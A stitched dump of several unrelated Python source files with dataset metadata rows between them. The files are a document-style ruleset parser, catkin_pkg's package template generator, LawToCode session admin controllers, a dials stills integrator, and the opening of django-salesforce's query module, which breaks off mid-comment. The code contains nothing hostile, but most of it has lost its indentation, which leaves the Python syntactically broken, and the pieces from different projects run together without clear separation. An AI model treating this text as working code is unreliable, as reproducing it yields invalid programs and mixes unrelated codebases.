try:
for klass in cls.__mro__:
if name in klass._attributes:
return klass._attributes[name]
except AttributeError:
pass
raise KeyError(name)
@classmethod
def attribute_type(cls, name):
try:
return cls.attribute_definition(name).accepted_type
except KeyError:
raise TypeError('{} is not a supported attribute for {}'
.format(name, cls.__name__))
@classmethod
def get_ruleset(self):
raise NotImplementedError
class DefaultValueException(Exception):
pass
class Configurable(object):
configuration_class = NotImplementedAttribute()
def configuration_name(self, document):
raise NotImplementedError
def get_config_value(self, attribute, document):
ruleset = self.configuration_class.get_ruleset(document)
return ruleset.get_value_for(self, attribute, document)
class BaseConfigurationException(Exception):
def __init__(self, base_name):
self.name = base_name
class Source(object):
"""Describes where a :class:`DocumentElement` was defined"""
@property
def location(self):
"""Textual representation of this source"""
return repr(self)
@property
def root(self):
"""Directory path for resolving paths relative to this source"""
return None
class RuleSet(OrderedDict, Source):
main_section = NotImplementedAttribute()
def __init__(self, name, base=None, source=None, **kwargs):
super().__init__(**kwargs)
self.name = name
self.base = base
self.source = source
self.variables = OrderedDict()
def contains(self, name):
return name in self or (self.base and self.base.contains(name))
def find_source(self, name):
"""Find top-most ruleset where configuration `name` is defined"""
if name in self:
return self.name
if self.base:
return self.base.find_source(name)
def get_configuration(self, name):
try:
return self[name]
except KeyError:
if self.base:
return self.base.get_configuration(name)
raise
def __setitem__(self, name, item):
assert name not in self
if isinstance(item, AttributesDictionary): # FIXME
self._validate_attributes(name, item)
super().__setitem__(name, item)
def __call__(self, name, **kwargs):
self[name] = self.get_entry_class(name)(**kwargs)
def __repr__(self):
return '{}({})'.format(type(self).__name__, self.name)
def __str__(self):
return repr(self)
def __bool__(self):
return True
RE_VARIABLE = re.compile(r'^\$\(([a-z_ -]+)\)$', re.IGNORECASE)
def _validate_attributes(self, name, attr_dict):
attr_dict.name = name
attr_dict.source = self
for key, val in attr_dict.items():
attr_dict[key] = self._validate_attribute(attr_dict, key, val)
def _validate_attribute(self, attr_dict, name, value):
attribute_type = attr_dict.attribute_type(name)
if isinstance(value, str):
stripped = value.replace('\n', ' ').strip()
m = self.RE_VARIABLE.match(stripped)
if m:
return Var(m.group(1))
value = self._attribute_from_string(attribute_type, stripped)
elif hasattr(value, 'source'):
value.source = self
if not isinstance(value, Var) and not attribute_type.check_type(value):
raise TypeError("{} ({}) is not of the correct type for the '{}' "
"attribute".format(value, type(value).__name__,
name))
return value
@cached
def _attribute_from_string(self, attribute_type, string):
return attribute_type.from_string(string, self)
def get_variable(self, configuration_class, attribute, variable):
try:
value = self.variables[variable.name]
except KeyError:
if not self.base:
raise VariableNotDefined("Variable '{}' is not defined"
.format(variable.name))
return self.base.get_variable(configuration_class, attribute,
variable)
return self._validate_attribute(configuration_class, attribute, value)
def get_entry_class(self, name):
raise NotImplementedError
def _get_value_recursive(self, name, attribute):
if name in self:
entry = self[name]
if attribute in entry:
return entry[attribute]
elif isinstance(entry.base, str):
raise BaseConfigurationException(entry.base)
elif entry.base is not None:
return entry.base[attribute]
if self.base:
return self.base._get_value_recursive(name, attribute)
raise DefaultValueException
@cached
def get_value(self, name, attribute):
try:
return self._get_value_recursive(name, attribute)
except BaseConfigurationException as exc:
return self.get_value(exc.name, attribute)
def _get_value_lookup(self, configurable, attribute, document):
name = configurable.configuration_name(document)
return self.get_value(name, attribute)
def get_value_for(self, configurable, attribute, document):
try:
value = self._get_value_lookup(configurable, attribute, document)
except DefaultValueException:
value = configurable.configuration_class._get_default(attribute)
if isinstance(value, Var):
configuration_class = configurable.configuration_class
value = self.get_variable(configuration_class, attribute, value)
return value
class RuleSetFile(RuleSet):
def __init__(self, filename, base=None, source=None, **kwargs):
self.filename = self._absolute_path(filename, source)
config = ConfigParser(default_section=None, delimiters=('=',),
interpolation=None)
with self.filename.open() as file:
config.read_file(file)
options = dict(config[self.main_section]
if config.has_section(self.main_section) else {})
name = options.pop('name', filename)
base = options.pop('base', base)
options.update(kwargs) # optionally override options
super().__init__(name, base=base, source=source, **options)
if config.has_section('VARIABLES'):
for name, value in config.items('VARIABLES'):
self.variables[name] = value
for section_name, section_body in config.items():
if section_name in (None, self.main_section, 'VARIABLES'):
continue
if ':' in section_name:
name, classifier = (s.strip() for s in section_name.split(':'))
else:
name, classifier = section_name.strip(), None
self.process_section(name, classifier, section_body.items())
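    # Sketch of the file layout parsed above (hypothetical section, entry and
    # variable names; the real main section name is defined by each subclass):
    #
    #   [MAIN_SECTION]
    #   name = my ruleset
    #   base = some-base-ruleset
    #
    #   [VARIABLES]
    #   accent-color = #0000FF
    #
    #   [SomeEntry : classifier]
    #   some_attribute = $(accent-color)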
@classmethod
def _absolute_path(cls, filename, source):
file_path = Path(filename)
if not file_path.is_absolute():
if source is None or source.root is None:
raise ValueError('{} path should be absolute: {}'
.format(cls.__name__, file_path))
file_path = source.root / file_path
return file_path
@property
def location(self):
return str(self.filename.resolve()), None, None
@property
def root(self):
return self.filename.parent.resolve()
def process_section(self, section_name, classifier, items):
raise NotImplementedError
class Bool(AttributeType):
"""Expresses a binary choice"""
@classmethod
def check_type(cls, value):
return isinstance(value, bool)
@classmethod
def from_tokens(cls, tokens, source):
string = next(tokens).string
lower_string = string.lower()
if lower_string not in ('true', 'false'):
raise ValueError("'{}' is not a valid {}. Must be one of 'true' "
"or 'false'".format(string, cls.__name__))
return lower_string == 'true'
@classmethod
def doc_repr(cls, value):
return '``{}``'.format(str(value).lower())
@classmethod
def doc_format(cls):
return '``true`` or ``false``'
class Integer(AttributeType):
"""Accepts natural numbers"""
@classmethod
def check_type(cls, value):
return isinstance(value, int)
@classmethod
def from_tokens(cls, tokens, source):
token = next(tokens)
sign = 1
if token.exact_type in (MINUS, PLUS):
sign = 1 if token.exact_type == PLUS else -1
token = next(tokens)
if token.type != NUMBER:
raise ParseError('Expecting a number')
try:
value = int(token.string)
except ValueError:
raise ParseError('Expecting an integer')
return sign * value
@classmethod
def doc_format(cls):
return 'a natural number (positive integer)'
class TokenIterator(PeekIterator):
"""Tokenizes `string` and iterates over the tokens"""
def __init__(self, string):
self.string = string
tokens = generate_tokens(StringIO(string).readline)
super().__init__(tokens)
def _advance(self):
result = super()._advance()
if self.next and self.next.type == NEWLINE and self.next.string == '':
super()._advance()
return result
class ParseError(Exception):
pass
# variables
class Var(object):
def __init__(self, name):
super().__init__()
self.name = name
def __repr__(self):
return "{}('{}')".format(type(self).__name__, self.name)
def __str__(self):
return '$({})'.format(self.name)
def __eq__(self, other):
return self.name == other.name
class VariableNotDefined(Exception):
pass
| agpl-3.0 | -5,342,931,260,759,857,000 | 32.710098 | 81 | 0.576239 | false | 4.414161 | true | false | false |
davetcoleman/catkin_pkg | src/catkin_pkg/package_templates.py | 3 | 18106 | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
import getpass
import os
import string
import sys
from catkin_pkg.cmake import configure_file
from catkin_pkg.cmake import get_metapackage_cmake_template_path
from catkin_pkg.package import Dependency
from catkin_pkg.package import Package
from catkin_pkg.package import PACKAGE_MANIFEST_FILENAME
from catkin_pkg.package import Person
class PackageTemplate(Package):
def __init__(self, catkin_deps=None, system_deps=None, boost_comps=None, **kwargs):
super(PackageTemplate, self).__init__(**kwargs)
self.catkin_deps = catkin_deps or []
self.system_deps = system_deps or []
self.boost_comps = boost_comps or []
self.validate()
@staticmethod
def _create_package_template(package_name, description=None, licenses=None,
maintainer_names=None, author_names=None,
version=None, catkin_deps=None, system_deps=None,
boost_comps=None):
"""
alternative factory method mapping CLI args to arguments for the
Package class
:param package_name:
:param description:
:param licenses:
:param maintainer_names:
:param authors:
:param version:
:param catkin_deps:
"""
# Sort so they are alphabetical
licenses = list(licenses or ["TODO"])
licenses.sort()
if not maintainer_names:
maintainer_names = [getpass.getuser()]
maintainer_names = list(maintainer_names or [])
maintainer_names.sort()
maintainers = []
for maintainer_name in maintainer_names:
maintainers.append(
Person(maintainer_name,
'%s@todo.todo' % maintainer_name.split()[-1])
)
author_names = list(author_names or [])
author_names.sort()
authors = []
for author_name in author_names:
authors.append(Person(author_name))
catkin_deps = list(catkin_deps or [])
catkin_deps.sort()
pkg_catkin_deps = []
build_depends = []
run_depends = []
buildtool_depends = [Dependency('catkin')]
for dep in catkin_deps:
if dep.lower() == 'catkin':
catkin_deps.remove(dep)
continue
if dep.lower() == 'genmsg':
sys.stderr.write('WARNING: Packages with messages or services should not depend on genmsg, but on message_generation and message_runtime\n')
buildtool_depends.append(Dependency('genmsg'))
continue
if dep.lower() == 'message_generation':
if not 'message_runtime' in catkin_deps:
sys.stderr.write('WARNING: Packages with messages or services should depend on both message_generation and message_runtime\n')
build_depends.append(Dependency('message_generation'))
continue
if dep.lower() == 'message_runtime':
if not 'message_generation' in catkin_deps:
sys.stderr.write('WARNING: Packages with messages or services should depend on both message_generation and message_runtime\n')
run_depends.append(Dependency('message_runtime'))
continue
pkg_catkin_deps.append(Dependency(dep))
for dep in pkg_catkin_deps:
build_depends.append(dep)
run_depends.append(dep)
if boost_comps:
if not system_deps:
system_deps = ['boost']
elif not 'boost' in system_deps:
system_deps.append('boost')
for dep in system_deps or []:
if not dep.lower().startswith('python-'):
build_depends.append(Dependency(dep))
run_depends.append(Dependency(dep))
package_temp = PackageTemplate(
name=package_name,
version=version or '0.0.0',
description=description or 'The %s package' % package_name,
buildtool_depends=buildtool_depends,
build_depends=build_depends,
run_depends=run_depends,
catkin_deps=catkin_deps,
system_deps=system_deps,
boost_comps=boost_comps,
licenses=licenses,
authors=authors,
maintainers=maintainers,
urls=[])
return package_temp
def read_template_file(filename, rosdistro):
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
templates = []
templates.append(os.path.join(template_dir, rosdistro, '%s.in' % filename))
templates.append(os.path.join(template_dir, '%s.in' % filename))
for template in templates:
if os.path.isfile(template):
with open(template, 'r') as fhand:
template_contents = fhand.read()
return template_contents
raise IOError(
"Could not read template for ROS distro "
"'{}' at '{}': ".format(rosdistro, ', '.join(templates)) +
"no such file or directory"
)
def _safe_write_files(newfiles, target_dir):
"""
writes file contents to target_dir/filepath for all entries of newfiles.
Aborts early if files exist in places for new files or directories
:param newfiles: a dict {filepath: contents}
:param target_dir: a string
"""
# first check no filename conflict exists
for filename in newfiles:
target_file = os.path.join(target_dir, filename)
if os.path.exists(target_file):
raise ValueError('File exists: %s' % target_file)
dirname = os.path.dirname(target_file)
while(dirname != target_dir):
if os.path.isfile(dirname):
raise ValueError('Cannot create directory, file exists: %s' %
dirname)
dirname = os.path.dirname(dirname)
for filename, content in newfiles.items():
target_file = os.path.join(target_dir, filename)
dirname = os.path.dirname(target_file)
if not os.path.exists(dirname):
os.makedirs(dirname)
# print(target_file, content)
with open(target_file, 'ab') as fhand:
fhand.write(content.encode())
print('Created file %s' % os.path.relpath(target_file, os.path.dirname(target_dir)))
def create_package_files(target_path, package_template, rosdistro,
newfiles=None, meta=False):
"""
creates several files from templates to start a new package.
:param target_path: parent folder where to create the package
:param package_template: contains the required information
:param rosdistro: name of the distro to look up respective template
:param newfiles: dict {filepath: contents} for additional files to write
"""
if newfiles is None:
newfiles = {}
# allow to replace default templates when path string is equal
manifest_path = os.path.join(target_path, PACKAGE_MANIFEST_FILENAME)
if manifest_path not in newfiles:
newfiles[manifest_path] = \
create_package_xml(package_template, rosdistro, meta=meta)
cmake_path = os.path.join(target_path, 'CMakeLists.txt')
if not cmake_path in newfiles:
newfiles[cmake_path] = create_cmakelists(package_template, rosdistro, meta=meta)
_safe_write_files(newfiles, target_path)
if 'roscpp' in package_template.catkin_deps:
fname = os.path.join(target_path, 'include', package_template.name)
os.makedirs(fname)
print('Created folder %s' % os.path.relpath(fname, os.path.dirname(target_path)))
if 'roscpp' in package_template.catkin_deps or \
'rospy' in package_template.catkin_deps:
fname = os.path.join(target_path, 'src')
os.makedirs(fname)
print('Created folder %s' % os.path.relpath(fname, os.path.dirname(target_path)))
class CatkinTemplate(string.Template):
"""subclass to use @ instead of $ as markers"""
delimiter = '@'
escape = '@'
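# Example (hypothetical template string):
#   CatkinTemplate('project(@name)').substitute({'name': 'foo'})  # -> 'project(foo)'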
def create_cmakelists(package_template, rosdistro, meta=False):
"""
:param package_template: contains the required information
:returns: file contents as string
"""
if meta:
template_path = get_metapackage_cmake_template_path()
temp_dict = {'name': package_template.name,
'metapackage_arguments': ''
}
return configure_file(template_path, temp_dict)
else:
cmakelists_txt_template = read_template_file('CMakeLists.txt', rosdistro)
ctemp = CatkinTemplate(cmakelists_txt_template)
if package_template.catkin_deps == []:
components = ''
else:
components = ' COMPONENTS\n %s\n' % '\n '.join(package_template.catkin_deps)
boost_find_package = \
('' if not package_template.boost_comps
else ('find_package(Boost REQUIRED COMPONENTS %s)\n' %
' '.join(package_template.boost_comps)))
system_find_package = ''
for sysdep in package_template.system_deps:
if sysdep == 'boost':
continue
if sysdep.startswith('python-'):
system_find_package += '# '
system_find_package += 'find_package(%s REQUIRED)\n' % sysdep
# provide dummy values
catkin_depends = (' '.join(package_template.catkin_deps)
if package_template.catkin_deps
else 'other_catkin_pkg')
system_depends = (' '.join(package_template.system_deps)
if package_template.system_deps
else 'system_lib')
message_pkgs = [pkg for pkg in package_template.catkin_deps if pkg.endswith('_msgs')]
if message_pkgs:
message_depends = '# %s' % '# '.join(message_pkgs)
else:
message_depends = '# std_msgs # Or other packages containing msgs'
temp_dict = {'name': package_template.name,
'components': components,
'include_directories': _create_include_macro(package_template),
'boost_find': boost_find_package,
'systems_find': system_find_package,
'catkin_depends': catkin_depends,
'system_depends': system_depends,
'target_libraries': _create_targetlib_args(package_template),
'message_dependencies': message_depends
}
return ctemp.substitute(temp_dict)
def _create_targetlib_args(package_template):
result = '# ${catkin_LIBRARIES}\n'
if package_template.boost_comps:
result += '# ${Boost_LIBRARIES}\n'
if package_template.system_deps:
result += (''.join(['# ${%s_LIBRARIES}\n' %
sdep for sdep in package_template.system_deps]))
return result
def _create_include_macro(package_template):
result = '# include_directories(include)'
includes = []
if package_template.catkin_deps:
includes.append('${catkin_INCLUDE_DIRS}')
if package_template.boost_comps:
includes.append('${Boost_INCLUDE_DIRS}')
if package_template.system_deps:
deplist = []
for sysdep in package_template.system_deps:
if not sysdep.startswith('python-'):
deplist.append(sysdep)
includes.append('${%s_INCLUDE_DIRS}' % sysdep)
if deplist:
result += '\n# TODO: Check names of system library include directories (%s)' % ', '.join(deplist)
if includes:
result += '\ninclude_directories(\n %s\n)' % '\n '.join(includes)
return result
def _create_depend_tag(dep_type,
name,
version_eq=None,
version_lt=None,
version_lte=None,
version_gt=None,
version_gte=None):
"""
Helper to create xml snippet for package.xml
"""
version_string = []
for key, var in {'version_eq': version_eq,
'version_lt': version_lt,
'version_lte': version_lte,
'version_gt': version_gt,
'version_gte': version_gte}.items():
if var is not None:
version_string.append(' %s="%s"' % (key, var))
result = ' <%s%s>%s</%s>\n' % (dep_type,
''.join(version_string),
name,
dep_type)
return result
def create_package_xml(package_template, rosdistro, meta=False):
"""
:param package_template: contains the required information
:returns: file contents as string
"""
package_xml_template = \
read_template_file(PACKAGE_MANIFEST_FILENAME, rosdistro)
ctemp = CatkinTemplate(package_xml_template)
temp_dict = {}
for key in package_template.__slots__:
temp_dict[key] = getattr(package_template, key)
if package_template.version_abi:
temp_dict['version_abi'] = ' abi="%s"' % package_template.version_abi
else:
temp_dict['version_abi'] = ''
if not package_template.description:
temp_dict['description'] = 'The %s package ...' % package_template.name
licenses = []
for plicense in package_template.licenses:
licenses.append(' <license>%s</license>\n' % plicense)
temp_dict['licenses'] = ''.join(licenses)
def get_person_tag(tagname, person):
email_string = (
"" if person.email is None else 'email="%s"' % person.email
)
return ' <%s %s>%s</%s>\n' % (tagname, email_string,
person.name, tagname)
maintainers = []
for maintainer in package_template.maintainers:
maintainers.append(get_person_tag('maintainer', maintainer))
temp_dict['maintainers'] = ''.join(maintainers)
urls = []
for url in package_template.urls:
type_string = ("" if url.type is None
else 'type="%s"' % url.type)
urls.append(' <url %s >%s</url>\n' % (type_string, url.url))
temp_dict['urls'] = ''.join(urls)
authors = []
for author in package_template.authors:
authors.append(get_person_tag('author', author))
temp_dict['authors'] = ''.join(authors)
dependencies = []
dep_map = {
'build_depend': package_template.build_depends,
'buildtool_depend': package_template.buildtool_depends,
'run_depend': package_template.run_depends,
'test_depend': package_template.test_depends,
'conflict': package_template.conflicts,
'replace': package_template.replaces
}
for dep_type in ['buildtool_depend', 'build_depend', 'run_depend',
'test_depend', 'conflict', 'replace']:
for dep in sorted(dep_map[dep_type], key=lambda x: x.name):
if 'depend' in dep_type:
dep_tag = _create_depend_tag(
dep_type,
dep.name,
dep.version_eq,
dep.version_lt,
dep.version_lte,
dep.version_gt,
dep.version_gte
)
dependencies.append(dep_tag)
else:
dependencies.append(_create_depend_tag(dep_type,
dep.name))
temp_dict['dependencies'] = ''.join(dependencies)
exports = []
if package_template.exports is not None:
for export in package_template.exports:
if export.content is not None:
print('WARNING: Create package does not know how to '
'serialize exports with content: '
'%s, %s, ' % (export.tagname, export.attributes) +
'%s' % (export.content),
file=sys.stderr)
else:
attribs = [' %s="%s"' % (k, v) for (k, v) in export.attributes.items()]
line = ' <%s%s/>\n' % (export.tagname, ''.join(attribs))
exports.append(line)
if meta:
exports.append(' <metapackage/>')
temp_dict['exports'] = ''.join(exports)
temp_dict['components'] = package_template.catkin_deps
return ctemp.substitute(temp_dict)
| bsd-3-clause | -7,094,375,736,727,865,000 | 40.243736 | 156 | 0.591738 | false | 4.16613 | false | false | false |
openfisca/LawToCode | lawtocode/controllers/sessions.py | 1 | 3560 | # -*- coding: utf-8 -*-
# Law-to-Code -- Extract formulas & parameters from laws
# By: Emmanuel Raviart <emmanuel@raviart.com>
#
# Copyright (C) 2013 OpenFisca Team
# https://github.com/openfisca/LawToCode
#
# This file is part of Law-to-Code.
#
# Law-to-Code is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Law-to-Code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Controllers for sessions"""
import collections
import logging
import webob
from .. import contexts, conv, model, paginations, templates, urls, wsgihelpers
log = logging.getLogger(__name__)
@wsgihelpers.wsgify
def admin_delete(req):
ctx = contexts.Ctx(req)
session = ctx.node
if not model.is_admin(ctx):
return wsgihelpers.forbidden(ctx,
explanation = ctx._("Deletion forbidden"),
message = ctx._("You can not delete a session."),
title = ctx._('Operation denied'),
)
if req.method == 'POST':
session.delete(ctx, safe = True)
return wsgihelpers.redirect(ctx, location = model.Session.get_admin_class_url(ctx))
return templates.render(ctx, '/sessions/admin-delete.mako', session = session)
@wsgihelpers.wsgify
def admin_index(req):
ctx = contexts.Ctx(req)
model.is_admin(ctx, check = True)
assert req.method == 'GET'
page_number, error = conv.pipe(
conv.input_to_int,
conv.test_greater_or_equal(1),
conv.default(1),
)(req.params.get('page'), state = ctx)
if error is not None:
return wsgihelpers.not_found(ctx, explanation = ctx._('Page number error: {}').format(error))
cursor = model.Session.find(as_class = collections.OrderedDict)
pager = paginations.Pager(item_count = cursor.count(), page_number = page_number)
sessions = cursor.skip(pager.first_item_index or 0).limit(pager.page_size)
return templates.render(ctx, '/sessions/admin-index.mako', sessions = sessions, pager = pager)
@wsgihelpers.wsgify
def admin_view(req):
ctx = contexts.Ctx(req)
session = ctx.node
model.is_admin(ctx, check = True)
return templates.render(ctx, '/sessions/admin-view.mako', session = session)
def route_admin(environ, start_response):
req = webob.Request(environ)
ctx = contexts.Ctx(req)
session, error = conv.pipe(
conv.input_to_uuid,
conv.not_none,
model.Session.uuid_to_instance,
)(req.urlvars.get('token'), state = ctx)
if error is not None:
return wsgihelpers.not_found(ctx, explanation = ctx._('Session Error: {}').format(error))(
environ, start_response)
ctx.node = session
router = urls.make_router(
('GET', '^/?$', admin_view),
(('GET', 'POST'), '^/delete/?$', admin_delete),
)
return router(environ, start_response)
def route_admin_class(environ, start_response):
router = urls.make_router(
('GET', '^/?$', admin_index),
(None, '^/(?P<token>[^/]+)(?=/|$)', route_admin),
)
return router(environ, start_response)
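# Illustrative summary of the URL layout produced by the routers above,
# relative to wherever route_admin_class is mounted:
#     GET        /                   -> admin_index
#     GET        /<token>/           -> admin_view
#     GET|POST   /<token>/delete/    -> admin_delete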
| agpl-3.0 | 6,062,235,559,573,949,000 | 29.956522 | 101 | 0.658146 | false | 3.552894 | false | false | false |
dials/dials | algorithms/integration/integrator_stills.py | 1 | 7546 | class ReflectionBlockIntegratorStills:
"""A class to perform the integration."""
def __init__(self, params, experiments, reference, extractor=None):
"""Initialise the integrator."""
from dials.algorithms import shoebox
# Ensure we have 1 experiment at the moment
assert len(experiments) == 1
assert extractor is not None
# Save the parameters
self.params = params
self.experiments = experiments
self.extractor = extractor
# Create the shoebox masker
n_sigma = params.integration.shoebox.n_sigma
assert n_sigma > 0
self._mask_profiles = shoebox.MaskerEmpirical(
experiments[0], reference=reference
)
def integrate(self):
"""Integrate all the reflections."""
from dials.algorithms.shoebox import MaskCode
from dials.array_family import flex
result = flex.reflection_table()
for indices, reflections in self.extractor:
self._mask_profiles(reflections, None)
reflections.integrate(self.experiments[0])
bg_code = MaskCode.Valid | MaskCode.BackgroundUsed
fg_code = MaskCode.Valid | MaskCode.Foreground
n_bg = reflections["shoebox"].count_mask_values(bg_code)
n_fg = reflections["shoebox"].count_mask_values(fg_code)
reflections["n_background"] = n_bg
reflections["n_foreground"] = n_fg
del reflections["shoebox"]
del reflections["rs_shoebox"]
result.extend(reflections)
assert len(result) > 0
result.sort("miller_index")
return result
class IntegratorStills:
"""Integrate reflections"""
def __init__(self, params, exlist, reference=None, predicted=None, shoeboxes=None):
"""Initialise the script."""
assert reference is not None
# Load the extractor based on the input
if shoeboxes is not None:
extractor = self._load_extractor(shoeboxes, params, exlist)
else:
if predicted is None:
predicted = self._predict_reflections(params, exlist)
# predicted = self._filter_reflections(params, exlist, predicted) # FIXME
predicted = self._match_with_reference(predicted, reference)
import math
from annlib_ext import AnnAdaptor
from dials.array_family import flex
matcheddata = predicted.select(
predicted.get_flags(predicted.flags.reference_spot)
)
A = AnnAdaptor(matcheddata["xyzcal.mm"].as_double(), 3, 10)
A.query(predicted["xyzcal.mm"].as_double())
bboxes = flex.int6()
for i, ref in enumerate(predicted):
nn_pred = [matcheddata[A.nn[i * 10 + j]] for j in range(10)]
nn_ref = [
reference[reference["miller_index"].first_index(r["miller_index"])]
for r in nn_pred
]
max_x = max([r["bbox"][1] - r["bbox"][0] for r in nn_ref])
max_y = max([r["bbox"][3] - r["bbox"][2] for r in nn_ref])
panel = exlist[ref["id"]].detector[ref["panel"]]
imgsize_x, imgsize_y = panel.get_image_size()
x1 = int(math.floor(ref["xyzcal.px"][0] - (max_x / 2)))
x2 = int(math.ceil(ref["xyzcal.px"][0] + (max_x / 2)))
y1 = int(math.floor(ref["xyzcal.px"][1] - (max_y / 2)))
y2 = int(math.ceil(ref["xyzcal.px"][1] + (max_y / 2)))
if x1 < 0:
x1 = 0
if y1 < 0:
y1 = 0
if x2 > imgsize_x:
x2 = imgsize_x
if y2 > imgsize_y:
y2 = imgsize_y
bboxes.append((x1, x2, y1, y2, 0, 1))
predicted["bbox"] = bboxes
extractor = self._create_extractor(params, exlist, predicted)
# Initialise the integrator
self._integrator = ReflectionBlockIntegratorStills(
params, exlist, reference, extractor
)
def integrate(self):
"""Integrate the reflections."""
return self._integrator.integrate()
def _match_with_reference(self, predicted, reference):
"""Match predictions with reference spots."""
from dials.algorithms.spot_finding.spot_matcher import SpotMatcher
from dials.util.command_line import Command
Command.start("Matching reference spots with predicted reflections")
match = SpotMatcher(max_separation=1)
rind, pind = match(reference, predicted)
h1 = predicted.select(pind)["miller_index"]
h2 = reference.select(rind)["miller_index"]
mask = h1 == h2
predicted.set_flags(pind.select(mask), predicted.flags.reference_spot)
Command.end(
"Matched %d reference spots with predicted reflections" % mask.count(True)
)
return predicted
def _load_extractor(self, filename, params, exlist):
"""Load the shoebox extractor."""
from dials.model.serialize.reflection_block import ReflectionBlockExtractor
assert len(exlist) == 1
imageset = exlist[0].imageset
return ReflectionBlockExtractor(
filename, params.integration.shoebox.block_size, imageset
)
def _create_extractor(self, params, exlist, predicted):
"""Create the extractor."""
from dials.model.serialize.reflection_block import ReflectionBlockExtractor
assert len(exlist) == 1
imageset = exlist[0].imageset
return ReflectionBlockExtractor(
"shoebox.dat", params.integration.shoebox.block_size, imageset, predicted
)
def _predict_reflections(self, params, experiments):
"""Predict all the reflections."""
from dials.array_family import flex
result = flex.reflection_table()
for i, experiment in enumerate(experiments):
predicted = flex.reflection_table.from_predictions(experiment)
predicted["id"] = flex.int(len(predicted), i)
result.extend(predicted)
return result
def _filter_reflections(self, params, experiments, reflections):
"""Filter the reflections to integrate."""
from dials.algorithms import filtering
from dials.array_family import flex
from dials.util.command_line import Command
# Set all reflections which overlap bad pixels to zero
Command.start("Filtering reflections by detector mask")
if experiments[0].scan is None:
array_range = 1
else:
array_range = experiments[0].scan.get_array_range()
mask = filtering.by_detector_mask(
reflections["bbox"],
experiments[0].imageset.get_raw_data(0)[0] >= 0,
array_range,
)
reflections.del_selected(not mask)
Command.end(f"Filtered {len(reflections)} reflections by detector mask")
# Filter the reflections by zeta
min_zeta = params.integration.filter.by_zeta
if min_zeta > 0:
Command.start(f"Filtering reflections by zeta >= {min_zeta:f}")
zeta = reflections.compute_zeta(experiments[0])
reflections.del_selected(flex.abs(zeta) < min_zeta)
n = len(reflections)
Command.end("Filtered %d reflections by zeta >= %f" % (n, min_zeta))
return reflections
| bsd-3-clause | -5,393,693,544,913,015,000 | 36.919598 | 89 | 0.590246 | false | 4.026681 | false | false | false |
philchristensen/django-salesforce | salesforce/backend/query.py | 1 | 21370 | # django-salesforce
#
# by Phil Christensen
# (c) 2012-2013 Freelancers Union (http://www.freelancersunion.org)
# See LICENSE.md for details
#
"""
Salesforce object query and queryset customizations.
"""
# TODO hynekcer: class CursorWrapper and function handle_api_exceptions should
# be moved to salesforce.backend.driver at the next big refactoring
# (Even so, some low level internals of salesforce.auth should be moved to
# salesforce.backend.driver.Connection)
import logging, types, datetime, decimal
from django.conf import settings
from django.core.serializers import python
from django.core.exceptions import ImproperlyConfigured
from django.db import connections
from django.db.models import query, Count
from django.db.models.sql import Query, RawQuery, constants, subqueries
from django.db.models.sql.datastructures import EmptyResultSet
from django.db.models.query_utils import deferred_class_factory
from django.utils.six import PY3
from itertools import islice
import requests
import pytz
from salesforce import auth, models, DJANGO_16_PLUS, DJANGO_17_PLUS, DJANGO_18_PLUS
from salesforce import DJANGO_184_PLUS
from salesforce.backend.compiler import SQLCompiler
from salesforce.fields import NOT_UPDATEABLE, NOT_CREATEABLE, SF_PK
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
import json
except ImportError:
import simplejson as json
log = logging.getLogger(__name__)
API_STUB = '/services/data/v34.0'
# Values of seconds are with 3 decimal places in SF, but they are rounded to
# whole seconds for the most of fields.
SALESFORCE_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%f+0000'
DJANGO_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S.%f-00:00'
request_count = 0
def quoted_string_literal(s, d):
"""
SOQL requires single quotes to be escaped.
http://www.salesforce.com/us/developer/docs/soql_sosl/Content/sforce_api_calls_soql_select_quotedstringescapes.htm
"""
try:
return "'%s'" % (s.replace("\\", "\\\\").replace("'", "\\'"),)
except TypeError as e:
raise NotImplementedError("Cannot quote %r objects: %r" % (type(s), s))
def process_args(args):
"""
Perform necessary quoting on the arg list.
"""
def _escape(item, conv):
if(isinstance(item, models.SalesforceModel)):
return conv.get(models.SalesforceModel, conv[str])(item, conv)
if(isinstance(item, decimal.Decimal)):
return conv.get(decimal.Decimal, conv[str])(item, conv)
return conv.get(type(item), conv[str])(item, conv)
return tuple([_escape(x, sql_conversions) for x in args])
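# Illustrative example (hypothetical values): every argument is converted with
# sql_conversions, so process_args((42, "O'Hara", None)) yields the tuple
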